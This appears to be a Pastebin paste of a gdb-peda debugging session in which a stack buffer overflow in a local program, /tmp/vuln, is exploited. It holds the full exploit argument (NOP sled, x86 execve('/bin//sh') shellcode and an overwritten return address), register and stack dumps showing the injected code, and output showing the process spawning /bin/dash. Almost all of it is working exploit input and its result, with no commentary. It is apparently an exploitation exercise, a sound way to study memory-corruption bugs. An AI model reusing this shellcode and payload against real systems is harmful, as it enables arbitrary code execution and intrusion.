Advertisement
Guest User

GDB Shell Opened

a guest
May 7th, 2017
198
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 4.32 KB | None | 0 0
  1. gdb-peda$ r $(python -c 'print "\x90" * 66 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" + "\x90" * 30 + "\x84\xcc\xff\xff" + "\x90" * 180')
  2. Starting program: /tmp/vuln $(python -c 'print "\x90" * 66 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" + "\x90" * 30 + "\x84\xcc\xff\xff" + "\x90" * 180')
  3.  
  4. [----------------------------------registers-----------------------------------]
  5. EAX: 0xffffcc84 --> 0x90909090
  6. EBX: 0x0
  7. ECX: 0xffffd1a0 --> 0x909090
  8. EDX: 0xffffcdb1 --> 0x909090
  9. ESI: 0xf7f9a000 --> 0x1b1db0
  10. EDI: 0xf7f9a000 --> 0x1b1db0
  11. EBP: 0xffffcdb8 --> 0x0
  12. ESP: 0xffffcc70 --> 0x8048520 ("Input: '%s'\n")
  13. EIP: 0x8048487 (<main+76>:  call   0x8048300 <printf@plt>)
  14. EFLAGS: 0x296 (carry PARITY ADJUST zero SIGN trap INTERRUPT direction overflow)
  15. [-------------------------------------code-------------------------------------]
  16.    0x804847b <main+64>: lea    eax,[ebp-0x134]
  17.    0x8048481 <main+70>: push   eax
  18.    0x8048482 <main+71>: push   0x8048520
  19. => 0x8048487 <main+76>: call   0x8048300 <printf@plt>
  20.    0x804848c <main+81>: add    esp,0x10
  21.    0x804848f <main+84>: mov    eax,0x0
  22.    0x8048494 <main+89>: mov    ecx,DWORD PTR [ebp-0x4]
  23.    0x8048497 <main+92>: leave
  24. Guessed arguments:
  25. arg[0]: 0x8048520 ("Input: '%s'\n")
  26. arg[1]: 0xffffcc84 --> 0x90909090
  27. [------------------------------------stack-------------------------------------]
  28. 0000| 0xffffcc70 --> 0x8048520 ("Input: '%s'\n")
  29. 0004| 0xffffcc74 --> 0xffffcc84 --> 0x90909090
  30. 0008| 0xffffcc78 --> 0x1
  31. 0012| 0xffffcc7c --> 0x1
  32. 0016| 0xffffcc80 --> 0xf7df4dc8 --> 0x2b76 ('v+')
  33. 0020| 0xffffcc84 --> 0x90909090
  34. 0024| 0xffffcc88 --> 0x90909090
  35. 0028| 0xffffcc8c --> 0x90909090
  36. [------------------------------------------------------------------------------]
  37. Legend: code, data, rodata, value
  38.  
  39. Breakpoint 1, 0x08048487 in main ()
  40. gdb-peda$ x/200xb $esp
  41. 0xffffcc70: 0x20    0x85    0x04    0x08    0x84    0xcc    0xff    0xff
  42. 0xffffcc78: 0x01    0x00    0x00    0x00    0x01    0x00    0x00    0x00
  43. 0xffffcc80: 0xc8    0x4d    0xdf    0xf7    0x90    0x90    0x90    0x90
  44. 0xffffcc88: 0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
  45. 0xffffcc90: 0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
  46. 0xffffcc98: 0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
  47. 0xffffcca0: 0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
  48. 0xffffcca8: 0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
  49. 0xffffccb0: 0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
  50. 0xffffccb8: 0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
  51. 0xffffccc0: 0x90    0x90    0x90    0x90    0x90    0x90    0x31    0xc0
  52. 0xffffccc8: 0x50    0x68    0x2f    0x2f    0x73    0x68    0x68    0x2f
  53. 0xffffccd0: 0x62    0x69    0x6e    0x89    0xe3    0x50    0x53    0x89
  54. 0xffffccd8: 0xe1    0x99    0xb0    0x0b    0xcd    0x80    0x90    0x90
  55. 0xffffcce0: 0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
  56. 0xffffcce8: 0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
  57. 0xffffccf0: 0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
  58. 0xffffccf8: 0x90    0x90    0x90    0x90    0x84    0xcc    0xff    0xff
  59. 0xffffcd00: 0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
  60. 0xffffcd08: 0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
  61. 0xffffcd10: 0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
  62. 0xffffcd18: 0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
  63. 0xffffcd20: 0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
  64. 0xffffcd28: 0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
  65. 0xffffcd30: 0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
  66. gdb-peda$ c
  67. Continuing.
  68. Input: '������������������������������������������������������������������1�Ph//shh/bin��PS�ᙰ
  69.                                                                                             ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������'
  70. process 13718 is executing new program: /bin/dash
  71. Warning:
  72. Cannot insert breakpoint 1.
  73. Cannot access memory at address 0x8048487
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement